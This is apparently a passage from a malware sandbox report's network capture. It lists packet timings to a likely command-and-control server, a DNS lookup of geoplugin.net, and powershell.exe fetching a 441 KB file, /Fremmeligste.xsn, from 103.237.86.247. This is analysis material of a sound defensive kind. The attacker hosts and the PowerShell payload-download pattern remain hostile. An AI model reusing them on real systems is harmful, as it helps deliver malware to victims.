                  Jul 2, 2024 07:49:36.792545080 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:36.797301054 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.548823118 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.553747892 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:37.558712959 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.855811119 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.857620955 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:37.862659931 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.862736940 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:37.866713047 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:37.871601105 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:37.881218910 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:37.886076927 CEST8049723178.237.33.50192.168.2.6
                  Jul 2, 2024 07:49:37.886198997 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:37.886504889 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:37.891316891 CEST8049723178.237.33.50192.168.2.6
                  Jul 2, 2024 07:49:37.905019045 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:38.499752998 CEST8049723178.237.33.50192.168.2.6
                  Jul 2, 2024 07:49:38.499824047 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:38.513673067 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:38.518724918 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:38.821245909 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:38.873791933 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.116837025 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.121767998 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.126600981 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.129029989 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.133770943 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.133847952 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.138596058 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.499109030 CEST8049723178.237.33.50192.168.2.6
                  Jul 2, 2024 07:49:39.500540018 CEST4972380192.168.2.6178.237.33.50
                  Jul 2, 2024 07:49:39.773494959 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773540974 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773556948 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773571968 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773642063 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.773653030 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:39.773672104 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:39.873790979 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.024327040 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024348021 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024370909 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024386883 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024400949 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024416924 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024431944 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.024434090 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.024463892 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.024463892 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.025151014 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.025166988 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.025198936 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.025331020 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.025381088 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.025823116 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.170677900 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.275245905 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275270939 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275294065 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275309086 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275325060 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275347948 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.275374889 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.275391102 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275407076 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.275430918 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.276022911 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276083946 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276103973 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.276106119 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276145935 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.276211977 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276228905 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.276288986 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.276932955 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.277021885 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.277043104 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.277070045 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.365611076 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.366449118 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.525635004 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.525655031 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.525721073 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:40.525829077 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:40.525907993 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786370039 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786384106 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786398888 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786412954 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786418915 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.786452055 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.786478043 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786499977 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786515951 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786530018 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786537886 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.786576033 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.786638975 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786653042 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786667109 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786695004 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.797070980 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.868459940 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.868540049 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030528069 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030555010 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030582905 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030606985 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030617952 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030622959 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030637980 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030654907 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030663013 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030678034 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030695915 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030726910 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030843973 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030934095 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030949116 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030963898 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030980110 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030983925 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031003952 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031205893 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031224012 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031238079 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031245947 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031253099 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031269073 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031276941 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031282902 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031305075 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031567097 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031583071 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031599045 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031608105 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031616926 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031631947 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031639099 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031672001 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031857014 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031872034 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031886101 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031922102 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031965971 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031980991 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031996965 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032006979 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032011032 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032026052 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032033920 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032041073 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032054901 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032063961 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032068968 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032108068 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032711983 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032727957 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032744884 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032753944 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032758951 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032773018 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032787085 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032789946 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032800913 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032814980 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032818079 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032829046 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032834053 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032844067 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032871962 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032877922 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032886982 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032902002 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032915115 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032946110 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033673048 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033703089 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033716917 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033730984 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033739090 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033745050 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033762932 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033771038 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033776999 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033792019 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033801079 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033807039 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033821106 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033832073 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033834934 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033849955 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033864975 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033870935 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033879995 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033890963 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033910990 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034519911 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034547091 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034560919 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034574032 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034588099 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034589052 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034605026 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034619093 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034626007 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034638882 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034640074 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034655094 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034667969 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034682989 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034697056 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034710884 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034713984 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034717083 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034729004 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034743071 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034780979 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035523891 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035541058 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035554886 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035568953 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035573006 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035583973 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035598040 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035598993 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035614967 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035629034 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035643101 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035644054 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035657883 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035666943 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035670996 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035685062 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035696030 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035698891 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035717010 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035734892 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035759926 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036410093 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036428928 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036447048 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036461115 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036474943 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036489964 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036506891 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036511898 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036521912 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036535978 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036554098 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036556005 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036566973 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036581993 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036586046 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036595106 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036608934 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036626101 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036633968 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036638975 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036653996 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036659956 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036689043 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037322044 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037339926 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037353992 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037362099 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037369013 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037386894 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037391901 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037403107 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037415028 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037422895 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037430048 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037444115 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037458897 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037460089 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037477970 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037477970 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037493944 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037522078 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.048124075 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.119354010 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.119437933 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.119530916 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.170706987 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.480952978 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.489152908 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489176989 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489187956 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489196062 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489198923 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.489204884 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489231110 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.489245892 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.491339922 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.491350889 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.491370916 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.491463900 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.493119001 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.495821953 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.495831966 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.495840073 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.497989893 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.498080015 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.498089075 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.498102903 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.517544985 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.523627043 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.523677111 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:50:05.832549095 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:50:05.833978891 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:50:05.840435982 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:50:35.870153904 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:50:35.871423960 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:50:35.880546093 CEST199349721103.237.87.156192.168.2.6
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 2, 2024 07:49:37.869257927 CEST | 49182 | 53 | 192.168.2.6 | 1.1.1.1
                  Jul 2, 2024 07:49:37.878782988 CEST | 53 | 49182 | 1.1.1.1 | 192.168.2.6
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jul 2, 2024 07:49:37.869257927 CEST | 192.168.2.6 | 1.1.1.1 | 0x223a | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jul 2, 2024 07:49:37.878782988 CEST | 1.1.1.1 | 192.168.2.6 | 0x223a | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                  • 103.237.86.247
                  • geoplugin.net
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.6 | 49711 | 103.237.86.247 | 80 | 3516 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 07:48:55.349364042 CEST | 174 | OUT | GET /Fremmeligste.xsn HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: 103.237.86.247
                  Connection: Keep-Alive
                  Jul 2, 2024 07:48:56.319933891 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Mon, 01 Jul 2024 08:12:37 GMT
                  Accept-Ranges: bytes
                  ETag: "6ddb8e6f8ecbda1:0"
                  Server: Microsoft-IIS/8.5
                  Date: Tue, 02 Jul 2024 05:48:51 GMT
                  Content-Length: 441636
